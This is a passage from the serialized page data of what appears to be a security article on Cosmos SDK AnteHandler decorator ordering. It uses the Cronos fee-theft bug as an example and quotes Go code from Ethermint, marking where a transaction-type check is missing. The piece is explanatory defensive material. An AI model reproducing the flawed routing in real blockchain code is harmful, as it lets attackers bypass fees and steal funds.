",{"type":28,"tag":98,"props":79311,"children":79313},{"className":79312},[],[79314],{"type":33,"value":79315},"SigGasConsumeDecorator",{"type":33,"value":10659},{"type":28,"tag":98,"props":79318,"children":79320},{"className":79319},[],[79321],{"type":33,"value":79322},"ConsumeGasForTxSizeDecorator",{"type":33,"value":79324},", that modify account balances. By placing our decorator at the very start of the chain, we might pass the check and later have the signers' balances deducted before reaching the end of the decorator chain and starting transaction execution. Consequently, the invariance we intended to ensure may no longer hold, rendering our check useless.",{"type":28,"tag":29,"props":79326,"children":79327},{},[79328,79330,79336,79338,79343],{"type":33,"value":79329},"The easiest \"mitigation\" is to move our decorator down into the chain list. We say this lightly because it's important to consider various factors such as whether nested ",{"type":28,"tag":98,"props":79331,"children":79333},{"className":79332},[],[79334],{"type":33,"value":79335},"msgs",{"type":33,"value":79337}," are allowed (e.g. the authz module is present), as this precaution alone might not be enough to fully resolve the issue. Without a comprehensive understanding of the entire system, there is a risk that mistakes will still be made in the ",{"type":28,"tag":98,"props":79339,"children":79341},{"className":79340},[],[79342],{"type":33,"value":78165},{"type":33,"value":79344}," chain.",{"type":28,"tag":75,"props":79346,"children":79348},{"id":79347},"real-world-examples-2",[79349],{"type":33,"value":76309},{"type":28,"tag":29,"props":79351,"children":79352},{},[79353,79355,79360,79362,79369],{"type":33,"value":79354},"An instance of ",{"type":28,"tag":98,"props":79356,"children":79358},{"className":79357},[],[79359],{"type":33,"value":78090},{"type":33,"value":79361}," misuse is a ",{"type":28,"tag":87,"props":79363,"children":79366},{"href":79364,"rel":79365},"https://medium.com/immunefi/cronos-theft-of-transactions-fees-bugfix-postmortem-b33f941b9570",[91],[79367],{"type":33,"value":79368},"Theft of Fund bug",{"type":33,"value":79370}," that was exploited in a Cronos contract.",{"type":28,"tag":29,"props":79372,"children":79373},{},[79374,79376,79381,79383,79388,79390,79396,79398,79404,79406,79411,79413,79418],{"type":33,"value":79375},"In this scenario, ",{"type":28,"tag":98,"props":79377,"children":79379},{"className":79378},[],[79380],{"type":33,"value":79335},{"type":33,"value":79382}," are multiplexed to different ",{"type":28,"tag":98,"props":79384,"children":79386},{"className":79385},[],[79387],{"type":33,"value":78090},{"type":33,"value":79389}," sets through the user-controlled ",{"type":28,"tag":98,"props":79391,"children":79393},{"className":79392},[],[79394],{"type":33,"value":79395},"ExtensionOptionsEthereumTx",{"type":33,"value":79397}," option. However, due to a lack of tx validation, if a ",{"type":28,"tag":98,"props":79399,"children":79401},{"className":79400},[],[79402],{"type":33,"value":79403},"MsgEthereumTx",{"type":33,"value":79405}," does not have ",{"type":28,"tag":98,"props":79407,"children":79409},{"className":79408},[],[79410],{"type":33,"value":79395},{"type":33,"value":79412}," specified, it will be routed to non-Ethereum ",{"type":28,"tag":98,"props":79414,"children":79416},{"className":79415},[],[79417],{"type":33,"value":78838},{"type":33,"value":79419},", failing to collect fees from users as intended. Consequently, attackers can exploit the fee refund at the end of transaction processing to steal funds.",{"type":28,"tag":29,"props":79421,"children":79422},{},[79423],{"type":28,"tag":87,"props":79424,"children":79427},{"href":79425,"rel":79426},"https://github.com/crypto-org-chain/ethermint/blob/82805507f7d2e83cad547736883dc22acfb52440/app/ante/ante.go#L33",[91],[79428],{"type":33,"value":76359},{"type":28,"tag":234,"props":79430,"children":79432},{"code":79431,"language":75784,"meta":7,"className":75785,"style":7},"func NewAnteHandler(\n    ak evmtypes.AccountKeeper,\n    bankKeeper evmtypes.BankKeeper,\n    evmKeeper EVMKeeper,\n    feeGrantKeeper authante.FeegrantKeeper,\n    channelKeeper channelkeeper.Keeper,\n    signModeHandler authsigning.SignModeHandler,\n) sdk.AnteHandler {\n    return func(\n        ctx sdk.Context, tx sdk.Tx, sim bool,\n    ) (newCtx sdk.Context, err error) {\n        var anteHandler sdk.AnteHandler\n\n        defer Recover(ctx.Logger(), &err)\n\n        txWithExtensions, ok := tx.(authante.HasExtensionOptionsTx)\n        if ok {\n            opts := txWithExtensions.GetExtensionOptions()\n            if len(opts) > 0 {\n                switch typeURL := opts[0].GetTypeUrl(); typeURL {\n                case \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\":\n                    // handle as *evmtypes.MsgEthereumTx\n\n                    anteHandler = sdk.ChainAnteDecorators(\n                        NewEthSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                        ...\n                        NewEthIncrementSenderSequenceDecorator(ak), // innermost AnteDecorator.\n                    )\n\n                default:\n                    return ctx, stacktrace.Propagate(\n                        sdkerrors.Wrap(sdkerrors.ErrUnknownExtensionOptions, typeURL),\n                        \"rejecting tx with unsupported extension option\",\n                    )\n                }\n\n                return anteHandler(ctx, tx, sim)\n            }\n        }\n\n        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n\n        switch tx.(type) {\n        case sdk.Tx:\n            anteHandler = sdk.ChainAnteDecorators(\n                authante.NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n                 ...\n                authante.NewIncrementSequenceDecorator(ak), // innermost AnteDecorator\n            )\n        default:\n            return ctx, stacktrace.Propagate(\n                sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"invalid transaction type: %T\", tx),\n                \"transaction is not an SDK tx\",\n            )\n        }\n\n        return anteHandler(ctx, tx, sim)\n    }\n}\n",[79433],{"type":28,"tag":98,"props":79434,"children":79435},{"__ignoreMap":7},[79436,79452,79477,79501,79518,79543,79569,79594,79617,79633,79689,79730,79756,79763,79809,79816,79862,79878,79908,79943,79995,80012,80020,80027,80056,80072,80080,80106,80114,80121,80133,80167,80213,80225,80232,80239,80246,80285,80292,80299,80306,80314,80321,80345,80369,80397,80422,80430,80463,80470,80482,80513,80568,80581,80589,80597,80605,80645,80653],{"type":28,"tag":116,"props":79437,"children":79438},{"class":245,"line":246},[79439,79443,79448],{"type":28,"tag":116,"props":79440,"children":79441},{"style":376},[79442],{"type":33,"value":75920},{"type":28,"tag":116,"props":79444,"children":79445},{"style":282},[79446],{"type":33,"value":79447}," NewAnteHandler",{"type":28,"tag":116,"props":79449,"children":79450},{"style":266},[79451],{"type":33,"value":3133},{"type":28,"tag":116,"props":79453,"children":79454},{"class":245,"line":256},[79455,79460,79465,79469,79473],{"type":28,"tag":116,"props":79456,"children":79457},{"style":272},[79458],{"type":33,"value":79459},"    ak",{"type":28,"tag":116,"props":79461,"children":79462},{"style":339},[79463],{"type":33,"value":79464}," evmtypes",{"type":28,"tag":116,"props":79466,"children":79467},{"style":266},[79468],{"type":33,"value":141},{"type":28,"tag":116,"props":79470,"children":79471},{"style":339},[79472],{"type":33,"value":79000},{"type":28,"tag":116,"props":79474,"children":79475},{"style":266},[79476],{"type":33,"value":3178},{"type":28,"tag":116,"props":79478,"children":79479},{"class":245,"line":293},[79480,79485,79489,79493,79497],{"type":28,"tag":116,"props":79481,"children":79482},{"style":272},[79483],{"type":33,"value":79484},"    bankKeeper",{"type":28,"tag":116,"props":79486,"children":79487},{"style":339},[79488],{"type":33,"value":79464},{"type":28,"tag":116,"props":79490,"children":79491},{"style":266},[79492],{"type":33,"value":141},{"type":28,"tag":116,"props":79494,"children":79495},{"style":339},[79496],{"type":33,"value":79073},{"type":28,"tag":116,"props":79498,"children":79499},{"style":266},[79500],{"type":33,"value":3178},{"type":28,"tag":116,"props":79502,"children":79503},{"class":245,"line":361},[79504,79509,79514],{"type":28,"tag":116,"props":79505,"children":79506},{"style":272},[79507],{"type":33,"value":79508},"    evmKeeper",{"type":28,"tag":116,"props":79510,"children":79511},{"style":339},[79512],{"type":33,"value":79513}," EVMKeeper",{"type":28,"tag":116,"props":79515,"children":79516},{"style":266},[79517],{"type":33,"value":3178},{"type":28,"tag":116,"props":79519,"children":79520},{"class":245,"line":387},[79521,79526,79531,79535,79539],{"type":28,"tag":116,"props":79522,"children":79523},{"style":272},[79524],{"type":33,"value":79525},"    feeGrantKeeper",{"type":28,"tag":116,"props":79527,"children":79528},{"style":339},[79529],{"type":33,"value":79530}," authante",{"type":28,"tag":116,"props":79532,"children":79533},{"style":266},[79534],{"type":33,"value":141},{"type":28,"tag":116,"props":79536,"children":79537},{"style":339},[79538],{"type":33,"value":79090},{"type":28,"tag":116,"props":79540,"children":79541},{"style":266},[79542],{"type":33,"value":3178},{"type":28,"tag":116,"props":79544,"children":79545},{"class":245,"line":400},[79546,79551,79556,79560,79565],{"type":28,"tag":116,"props":79547,"children":79548},{"style":272},[79549],{"type":33,"value":79550},"    channelKeeper",{"type":28,"tag":116,"props":79552,"children":79553},{"style":339},[79554],{"type":33,"value":79555}," channelkeeper",{"type":28,"tag":116,"props":79557,"children":79558},{"style":266},[79559],{"type":33,"value":141},{"type":28,"tag":116,"props":79561,"children":79562},{"style":339},[79563],{"type":33,"value":79564},"Keeper",{"type":28,"tag":116,"props":79566,"children":79567},{"style":266},[79568],{"type":33,"value":3178},{"type":28,"tag":116,"props":79570,"children":79571},{"class":245,"line":614},[79572,79577,79582,79586,79590],{"type":28,"tag":116,"props":79573,"children":79574},{"style":272},[79575],{"type":33,"value":79576},"    signModeHandler",{"type":28,"tag":116,"props":79578,"children":79579},{"style":339},[79580],{"type":33,"value":79581}," authsigning",{"type":28,"tag":116,"props":79583,"children":79584},{"style":266},[79585],{"type":33,"value":141},{"type":28,"tag":116,"props":79587,"children":79588},{"style":339},[79589],{"type":33,"value":79258},{"type":28,"tag":116,"props":79591,"children":79592},{"style":266},[79593],{"type":33,"value":3178},{"type":28,"tag":116,"props":79595,"children":79596},{"class":245,"line":631},[79597,79601,79605,79609,79613],{"type":28,"tag":116,"props":79598,"children":79599},{"style":266},[79600],{"type":33,"value":1609},{"type":28,"tag":116,"props":79602,"children":79603},{"style":339},[79604],{"type":33,"value":78350},{"type":28,"tag":116,"props":79606,"children":79607},{"style":266},[79608],{"type":33,"value":141},{"type":28,"tag":116,"props":79610,"children":79611},{"style":339},[79612],{"type":33,"value":78090},{"type":28,"tag":116,"props":79614,"children":79615},{"style":266},[79616],{"type":33,"value":1291},{"type":28,"tag":116,"props":79618,"children":79619},{"class":245,"line":665},[79620,79624,79629],{"type":28,"tag":116,"props":79621,"children":79622},{"style":260},[79623],{"type":33,"value":393},{"type":28,"tag":116,"props":79625,"children":79626},{"style":376},[79627],{"type":33,"value":79628}," func",{"type":28,"tag":116,"props":79630,"children":79631},{"style":266},[79632],{"type":33,"value":3133},{"type":28,"tag":116,"props":79634,"children":79635},{"class":245,"line":713},[79636,79640,79644,79648,79652,79656,79660,79664,79668,79672,79676,79681,79685],{"type":28,"tag":116,"props":79637,"children":79638},{"style":272},[79639],{"type":33,"value":25841},{"type":28,"tag":116,"props":79641,"children":79642},{"style":339},[79643],{"type":33,"value":78261},{"type":28,"tag":116,"props":79645,"children":79646},{"style":266},[79647],{"type":33,"value":141},{"type":28,"tag":116,"props":79649,"children":79650},{"style":339},[79651],{"type":33,"value":75969},{"type":28,"tag":116,"props":79653,"children":79654},{"style":266},[79655],{"type":33,"value":825},{"type":28,"tag":116,"props":79657,"children":79658},{"style":272},[79659],{"type":33,"value":78800},{"type":28,"tag":116,"props":79661,"children":79662},{"style":339},[79663],{"type":33,"value":78261},{"type":28,"tag":116,"props":79665,"children":79666},{"style":266},[79667],{"type":33,"value":141},{"type":28,"tag":116,"props":79669,"children":79670},{"style":339},[79671],{"type":33,"value":78294},{"type":28,"tag":116,"props":79673,"children":79674},{"style":266},[79675],{"type":33,"value":825},{"type":28,"tag":116,"props":79677,"children":79678},{"style":272},[79679],{"type":33,"value":79680},"sim",{"type":28,"tag":116,"props":79682,"children":79683},{"style":339},[79684],{"type":33,"value":11718},{"type":28,"tag":116,"props":79686,"children":79687},{"style":266},[79688],{"type":33,"value":3178},{"type":28,"tag":116,"props":79690,"children":79691},{"class":245,"line":750},[79692,79697,79702,79706,79710,79714,79718,79722,79726],{"type":28,"tag":116,"props":79693,"children":79694},{"style":266},[79695],{"type":33,"value":79696},"    ) (",{"type":28,"tag":116,"props":79698,"children":79699},{"style":272},[79700],{"type":33,"value":79701},"newCtx",{"type":28,"tag":116,"props":79703,"children":79704},{"style":339},[79705],{"type":33,"value":78261},{"type":28,"tag":116,"props":79707,"children":79708},{"style":266},[79709],{"type":33,"value":141},{"type":28,"tag":116,"props":79711,"children":79712},{"style":339},[79713],{"type":33,"value":75969},{"type":28,"tag":116,"props":79715,"children":79716},{"style":266},[79717],{"type":33,"value":825},{"type":28,"tag":116,"props":79719,"children":79720},{"style":272},[79721],{"type":33,"value":1907},{"type":28,"tag":116,"props":79723,"children":79724},{"style":339},[79725],{"type":33,"value":14540},{"type":28,"tag":116,"props":79727,"children":79728},{"style":266},[79729],{"type":33,"value":844},{"type":28,"tag":116,"props":79731,"children":79732},{"class":245,"line":779},[79733,79738,79743,79747,79751],{"type":28,"tag":116,"props":79734,"children":79735},{"style":376},[79736],{"type":33,"value":79737},"        var",{"type":28,"tag":116,"props":79739,"children":79740},{"style":272},[79741],{"type":33,"value":79742}," anteHandler",{"type":28,"tag":116,"props":79744,"children":79745},{"style":339},[79746],{"type":33,"value":78261},{"type":28,"tag":116,"props":79748,"children":79749},{"style":266},[79750],{"type":33,"value":141},{"type":28,"tag":116,"props":79752,"children":79753},{"style":339},[79754],{"type":33,"value":79755},"AnteHandler\n",{"type":28,"tag":116,"props":79757,"children":79758},{"class":245,"line":796},[79759],{"type":28,"tag":116,"props":79760,"children":79761},{"emptyLinePlaceholder":19},[79762],{"type":33,"value":1044},{"type":28,"tag":116,"props":79764,"children":79765},{"class":245,"line":847},[79766,79771,79776,79780,79784,79788,79793,79797,79801,79805],{"type":28,"tag":116,"props":79767,"children":79768},{"style":260},[79769],{"type":33,"value":79770},"        defer",{"type":28,"tag":116,"props":79772,"children":79773},{"style":282},[79774],{"type":33,"value":79775}," Recover",{"type":28,"tag":116,"props":79777,"children":79778},{"style":266},[79779],{"type":33,"value":313},{"type":28,"tag":116,"props":79781,"children":79782},{"style":272},[79783],{"type":33,"value":19944},{"type":28,"tag":116,"props":79785,"children":79786},{"style":266},[79787],{"type":33,"value":141},{"type":28,"tag":116,"props":79789,"children":79790},{"style":282},[79791],{"type":33,"value":79792},"Logger",{"type":28,"tag":116,"props":79794,"children":79795},{"style":266},[79796],{"type":33,"value":18038},{"type":28,"tag":116,"props":79798,"children":79799},{"style":370},[79800],{"type":33,"value":2780},{"type":28,"tag":116,"props":79802,"children":79803},{"style":272},[79804],{"type":33,"value":1907},{"type":28,"tag":116,"props":79806,"children":79807},{"style":266},[79808],{"type":33,"value":2830},{"type":28,"tag":116,"props":79810,"children":79811},{"class":245,"line":898},[79812],{"type":28,"tag":116,"props":79813,"children":79814},{"emptyLinePlaceholder":19},[79815],{"type":33,"value":1044},{"type":28,"tag":116,"props":79817,"children":79818},{"class":245,"line":907},[79819,79824,79828,79832,79836,79840,79844,79849,79853,79858],{"type":28,"tag":116,"props":79820,"children":79821},{"style":272},[79822],{"type":33,"value":79823},"        txWithExtensions",{"type":28,"tag":116,"props":79825,"children":79826},{"style":266},[79827],{"type":33,"value":825},{"type":28,"tag":116,"props":79829,"children":79830},{"style":272},[79831],{"type":33,"value":78387},{"type":28,"tag":116,"props":79833,"children":79834},{"style":370},[79835],{"type":33,"value":76036},{"type":28,"tag":116,"props":79837,"children":79838},{"style":272},[79839],{"type":33,"value":67648},{"type":28,"tag":116,"props":79841,"children":79842},{"style":266},[79843],{"type":33,"value":78400},{"type":28,"tag":116,"props":79845,"children":79846},{"style":339},[79847],{"type":33,"value":79848},"authante",{"type":28,"tag":116,"props":79850,"children":79851},{"style":266},[79852],{"type":33,"value":141},{"type":28,"tag":116,"props":79854,"children":79855},{"style":339},[79856],{"type":33,"value":79857},"HasExtensionOptionsTx",{"type":28,"tag":116,"props":79859,"children":79860},{"style":266},[79861],{"type":33,"value":2830},{"type":28,"tag":116,"props":79863,"children":79864},{"class":245,"line":981},[79865,79869,79874],{"type":28,"tag":116,"props":79866,"children":79867},{"style":260},[79868],{"type":33,"value":2943},{"type":28,"tag":116,"props":79870,"children":79871},{"style":272},[79872],{"type":33,"value":79873}," ok",{"type":28,"tag":116,"props":79875,"children":79876},{"style":266},[79877],{"type":33,"value":1291},{"type":28,"tag":116,"props":79879,"children":79880},{"class":245,"line":1011},[79881,79886,79890,79895,79899,79904],{"type":28,"tag":116,"props":79882,"children":79883},{"style":272},[79884],{"type":33,"value":79885},"            opts",{"type":28,"tag":116,"props":79887,"children":79888},{"style":370},[79889],{"type":33,"value":76036},{"type":28,"tag":116,"props":79891,"children":79892},{"style":272},[79893],{"type":33,"value":79894}," txWithExtensions",{"type":28,"tag":116,"props":79896,"children":79897},{"style":266},[79898],{"type":33,"value":141},{"type":28,"tag":116,"props":79900,"children":79901},{"style":282},[79902],{"type":33,"value":79903},"GetExtensionOptions",{"type":28,"tag":116,"props":79905,"children":79906},{"style":266},[79907],{"type":33,"value":7407},{"type":28,"tag":116,"props":79909,"children":79910},{"class":245,"line":1029},[79911,79915,79919,79923,79927,79931,79935,79939],{"type":28,"tag":116,"props":79912,"children":79913},{"style":260},[79914],{"type":33,"value":58419},{"type":28,"tag":116,"props":79916,"children":79917},{"style":282},[79918],{"type":33,"value":8230},{"type":28,"tag":116,"props":79920,"children":79921},{"style":266},[79922],{"type":33,"value":313},{"type":28,"tag":116,"props":79924,"children":79925},{"style":272},[79926],{"type":33,"value":48183},{"type":28,"tag":116,"props":79928,"children":79929},{"style":266},[79930],{"type":33,"value":1609},{"type":28,"tag":116,"props":79932,"children":79933},{"style":370},[79934],{"type":33,"value":645},{"type":28,"tag":116,"props":79936,"children":79937},{"style":350},[79938],{"type":33,"value":2718},{"type":28,"tag":116,"props":79940,"children":79941},{"style":266},[79942],{"type":33,"value":1291},{"type":28,"tag":116,"props":79944,"children":79945},{"class":245,"line":1038},[79946,79951,79956,79960,79965,79969,79973,79977,79982,79986,79991],{"type":28,"tag":116,"props":79947,"children":79948},{"style":260},[79949],{"type":33,"value":79950},"                switch",{"type":28,"tag":116,"props":79952,"children":79953},{"style":272},[79954],{"type":33,"value":79955}," typeURL",{"type":28,"tag":116,"props":79957,"children":79958},{"style":370},[79959],{"type":33,"value":76036},{"type":28,"tag":116,"props":79961,"children":79962},{"style":272},[79963],{"type":33,"value":79964}," opts",{"type":28,"tag":116,"props":79966,"children":79967},{"style":266},[79968],{"type":33,"value":347},{"type":28,"tag":116,"props":79970,"children":79971},{"style":350},[79972],{"type":33,"value":353},{"type":28,"tag":116,"props":79974,"children":79975},{"style":266},[79976],{"type":33,"value":49968},{"type":28,"tag":116,"props":79978,"children":79979},{"style":282},[79980],{"type":33,"value":79981},"GetTypeUrl",{"type":28,"tag":116,"props":79983,"children":79984},{"style":266},[79985],{"type":33,"value":28103},{"type":28,"tag":116,"props":79987,"children":79988},{"style":272},[79989],{"type":33,"value":79990},"typeURL",{"type":28,"tag":116,"props":79992,"children":79993},{"style":266},[79994],{"type":33,"value":1291},{"type":28,"tag":116,"props":79996,"children":79997},{"class":245,"line":1047},[79998,80003,80008],{"type":28,"tag":116,"props":79999,"children":80000},{"style":260},[80001],{"type":33,"value":80002},"                case",{"type":28,"tag":116,"props":80004,"children":80005},{"style":563},[80006],{"type":33,"value":80007}," \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\"",{"type":28,"tag":116,"props":80009,"children":80010},{"style":266},[80011],{"type":33,"value":5239},{"type":28,"tag":116,"props":80013,"children":80014},{"class":245,"line":1071},[80015],{"type":28,"tag":116,"props":80016,"children":80017},{"style":250},[80018],{"type":33,"value":80019},"                    // handle as *evmtypes.MsgEthereumTx\n",{"type":28,"tag":116,"props":80021,"children":80022},{"class":245,"line":1137},[80023],{"type":28,"tag":116,"props":80024,"children":80025},{"emptyLinePlaceholder":19},[80026],{"type":33,"value":1044},{"type":28,"tag":116,"props":80028,"children":80029},{"class":245,"line":1181},[80030,80035,80039,80043,80047,80052],{"type":28,"tag":116,"props":80031,"children":80032},{"style":272},[80033],{"type":33,"value":80034},"                    anteHandler",{"type":28,"tag":116,"props":80036,"children":80037},{"style":370},[80038],{"type":33,"value":2226},{"type":28,"tag":116,"props":80040,"children":80041},{"style":272},[80042],{"type":33,"value":78261},{"type":28,"tag":116,"props":80044,"children":80045},{"style":266},[80046],{"type":33,"value":141},{"type":28,"tag":116,"props":80048,"children":80049},{"style":282},[80050],{"type":33,"value":80051},"ChainAnteDecorators",{"type":28,"tag":116,"props":80053,"children":80054},{"style":266},[80055],{"type":33,"value":3133},{"type":28,"tag":116,"props":80057,"children":80058},{"class":245,"line":1212},[80059,80064,80068],{"type":28,"tag":116,"props":80060,"children":80061},{"style":282},[80062],{"type":33,"value":80063},"                        NewEthSetUpContextDecorator",{"type":28,"tag":116,"props":80065,"children":80066},{"style":266},[80067],{"type":33,"value":18038},{"type":28,"tag":116,"props":80069,"children":80070},{"style":250},[80071],{"type":33,"value":78914},{"type":28,"tag":116,"props":80073,"children":80074},{"class":245,"line":1254},[80075],{"type":28,"tag":116,"props":80076,"children":80077},{"style":370},[80078],{"type":33,"value":80079},"                        ...\n",{"type":28,"tag":116,"props":80081,"children":80082},{"class":245,"line":1262},[80083,80088,80092,80097,80101],{"type":28,"tag":116,"props":80084,"children":80085},{"style":282},[80086],{"type":33,"value":80087},"                        NewEthIncrementSenderSequenceDecorator",{"type":28,"tag":116,"props":80089,"children":80090},{"style":266},[80091],{"type":33,"value":313},{"type":28,"tag":116,"props":80093,"children":80094},{"style":272},[80095],{"type":33,"value":80096},"ak",{"type":28,"tag":116,"props":80098,"children":80099},{"style":266},[80100],{"type":33,"value":14840},{"type":28,"tag":116,"props":80102,"children":80103},{"style":250},[80104],{"type":33,"value":80105},"// innermost AnteDecorator.\n",{"type":28,"tag":116,"props":80107,"children":80108},{"class":245,"line":1294},[80109],{"type":28,"tag":116,"props":80110,"children":80111},{"style":266},[80112],{"type":33,"value":80113},"                    )\n",{"type":28,"tag":116,"props":80115,"children":80116},{"class":245,"line":1334},[80117],{"type":28,"tag":116,"props":80118,"children":80119},{"emptyLinePlaceholder":19},[80120],{"type":33,"value":1044},{"type":28,"tag":116,"props":80122,"children":80123},{"class":245,"line":1372},[80124,80129],{"type":28,"tag":116,"props":80125,"children":80126},{"style":260},[80127],{"type":33,"value":80128},"                default",{"type":28,"tag":116,"props":80130,"children":80131},{"style":266},[80132],{"type":33,"value":5239},{"type":28,"tag":116,"props":80134,"children":80135},{"class":245,"line":1381},[80136,80141,80145,80149,80154,80158,80163],{"type":28,"tag":116,"props":80137,"children":80138},{"style":260},[80139],{"type":33,"value":80140},"                    return",{"type":28,"tag":116,"props":80142,"children":80143},{"style":272},[80144],{"type":33,"value":25498},{"type":28,"tag":116,"props":80146,"children":80147},{"style":266},[80148],{"type":33,"value":825},{"type":28,"tag":116,"props":80150,"children":80151},{"style":272},[80152],{"type":33,"value":80153},"stacktrace",{"type":28,"tag":116,"props":80155,"children":80156},{"style":266},[80157],{"type":33,"value":141},{"type":28,"tag":116,"props":80159,"children":80160},{"style":282},[80161],{"type":33,"value":80162},"Propagate",{"type":28,"tag":116,"props":80164,"children":80165},{"style":266},[80166],{"type":33,"value":3133},{"type":28,"tag":116,"props":80168,"children":80169},{"class":245,"line":1389},[80170,80175,80179,80183,80187,80192,80196,80201,80205,80209],{"type":28,"tag":116,"props":80171,"children":80172},{"style":272},[80173],{"type":33,"value":80174},"                        sdkerrors",{"type":28,"tag":116,"props":80176,"children":80177},{"style":266},[80178],{"type":33,"value":141},{"type":28,"tag":116,"props":80180,"children":80181},{"style":282},[80182],{"type":33,"value":78466},{"type":28,"tag":116,"props":80184,"children":80185},{"style":266},[80186],{"type":33,"value":313},{"type":28,"tag":116,"props":80188,"children":80189},{"style":272},[80190],{"type":33,"value":80191},"sdkerrors",{"type":28,"tag":116,"props":80193,"children":80194},{"style":266},[80195],{"type":33,"value":141},{"type":28,"tag":116,"props":80197,"children":80198},{"style":272},[80199],{"type":33,"value":80200},"ErrUnknownExtensionOptions",{"type":28,"tag":116,"props":80202,"children":80203},{"style":266},[80204],{"type":33,"value":825},{"type":28,"tag":116,"props":80206,"children":80207},{"style":272},[80208],{"type":33,"value":79990},{"type":28,"tag":116,"props":80210,"children":80211},{"style":266},[80212],{"type":33,"value":6408},{"type":28,"tag":116,"props":80214,"children":80215},{"class":245,"line":1425},[80216,80221],{"type":28,"tag":116,"props":80217,"children":80218},{"style":563},[80219],{"type":33,"value":80220},"                        \"rejecting tx with unsupported extension option\"",{"type":28,"tag":116,"props":80222,"children":80223},{"style":266},[80224],{"type":33,"value":3178},{"type":28,"tag":116,"props":80226,"children":80227},{"class":245,"line":1448},[80228],{"type":28,"tag":116,"props":80229,"children":80230},{"style":266},[80231],{"type":33,"value":80113},{"type":28,"tag":116,"props":80233,"children":80234},{"class":245,"line":1456},[80235],{"type":28,"tag":116,"props":80236,"children":80237},{"style":266},[80238],{"type":33,"value":70689},{"type":28,"tag":116,"props":80240,"children":80241},{"class":245,"line":1520},[80242],{"type":28,"tag":116,"props":80243,"children":80244},{"emptyLinePlaceholder":19},[80245],{"type":33,"value":1044},{"type":28,"tag":116,"props":80247,"children":80248},{"class":245,"line":1580},[80249,80253,80257,80261,80265,80269,80273,80277,80281],{"type":28,"tag":116,"props":80250,"children":80251},{"style":260},[80252],{"type":33,"value":60347},{"type":28,"tag":116,"props":80254,"children":80255},{"style":282},[80256],{"type":33,"value":79742},{"type":28,"tag":116,"props":80258,"children":80259},{"style":266},[80260],{"type":33,"value":313},{"type":28,"tag":116,"props":80262,"children":80263},{"style":272},[80264],{"type":33,"value":19944},{"type":28,"tag":116,"props":80266,"children":80267},{"style":266},[80268],{"type":33,"value":825},{"type":28,"tag":116,"props":80270,"children":80271},{"style":272},[80272],{"type":33,"value":78800},{"type":28,"tag":116,"props":80274,"children":80275},{"style":266},[80276],{"type":33,"value":825},{"type":28,"tag":116,"props":80278,"children":80279},{"style":272},[80280],{"type":33,"value":79680},{"type":28,"tag":116,"props":80282,"children":80283},{"style":266},[80284],{"type":33,"value":2830},{"type":28,"tag":116,"props":80286,"children":80287},{"class":245,"line":1620},[80288],{"type":28,"tag":116,"props":80289,"children":80290},{"style":266},[80291],{"type":33,"value":58503},{"type":28,"tag":116,"props":80293,"children":80294},{"class":245,"line":1668},[80295],{"type":28,"tag":116,"props":80296,"children":80297},{"style":266},[80298],{"type":33,"value":1954},{"type":28,"tag":116,"props":80300,"children":80301},{"class":245,"line":1677},[80302],{"type":28,"tag":116,"props":80303,"children":80304},{"emptyLinePlaceholder":19},[80305],{"type":33,"value":1044},{"type":28,"tag":116,"props":80307,"children":80308},{"class":245,"line":1685},[80309],{"type":28,"tag":116,"props":80310,"children":80311},{"style":250},[80312],{"type":33,"value":80313},"        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n",{"type":28,"tag":116,"props":80315,"children":80316},{"class":245,"line":1729},[80317],{"type":28,"tag":116,"props":80318,"children":80319},{"emptyLinePlaceholder":19},[80320],{"type":33,"value":1044},{"type":28,"tag":116,"props":80322,"children":80323},{"class":245,"line":1764},[80324,80329,80333,80337,80341],{"type":28,"tag":116,"props":80325,"children":80326},{"style":260},[80327],{"type":33,"value":80328},"        switch",{"type":28,"tag":116,"props":80330,"children":80331},{"style":272},[80332],{"type":33,"value":67648},{"type":28,"tag":116,"props":80334,"children":80335},{"style":266},[80336],{"type":33,"value":78400},{"type":28,"tag":116,"props":80338,"children":80339},{"style":376},[80340],{"type":33,"value":32394},{"type":28,"tag":116,"props":80342,"children":80343},{"style":266},[80344],{"type":33,"value":844},{"type":28,"tag":116,"props":80346,"children":80347},{"class":245,"line":1896},[80348,80353,80357,80361,80365],{"type":28,"tag":116,"props":80349,"children":80350},{"style":260},[80351],{"type":33,"value":80352},"        case",{"type":28,"tag":116,"props":80354,"children":80355},{"style":339},[80356],{"type":33,"value":78261},{"type":28,"tag":116,"props":80358,"children":80359},{"style":266},[80360],{"type":33,"value":141},{"type":28,"tag":116,"props":80362,"children":80363},{"style":339},[80364],{"type":33,"value":78294},{"type":28,"tag":116,"props":80366,"children":80367},{"style":266},[80368],{"type":33,"value":5239},{"type":28,"tag":116,"props":80370,"children":80371},{"class":245,"line":1932},[80372,80377,80381,80385,80389,80393],{"type":28,"tag":116,"props":80373,"children":80374},{"style":272},[80375],{"type":33,"value":80376},"            anteHandler",{"type":28,"tag":116,"props":80378,"children":80379},{"style":370},[80380],{"type":33,"value":2226},{"type":28,"tag":116,"props":80382,"children":80383},{"style":272},[80384],{"type":33,"value":78261},{"type":28,"tag":116,"props":80386,"children":80387},{"style":266},[80388],{"type":33,"value":141},{"type":28,"tag":116,"props":80390,"children":80391},{"style":282},[80392],{"type":33,"value":80051},{"type":28,"tag":116,"props":80394,"children":80395},{"style":266},[80396],{"type":33,"value":3133},{"type":28,"tag":116,"props":80398,"children":80399},{"class":245,"line":1940},[80400,80405,80409,80414,80418],{"type":28,"tag":116,"props":80401,"children":80402},{"style":272},[80403],{"type":33,"value":80404},"                authante",{"type":28,"tag":116,"props":80406,"children":80407},{"style":266},[80408],{"type":33,"value":141},{"type":28,"tag":116,"props":80410,"children":80411},{"style":282},[80412],{"type":33,"value":80413},"NewSetUpContextDecorator",{"type":28,"tag":116,"props":80415,"children":80416},{"style":266},[80417],{"type":33,"value":18038},{"type":28,"tag":116,"props":80419,"children":80420},{"style":250},[80421],{"type":33,"value":78914},{"type":28,"tag":116,"props":80423,"children":80424},{"class":245,"line":1948},[80425],{"type":28,"tag":116,"props":80426,"children":80427},{"style":370},[80428],{"type":33,"value":80429},"                 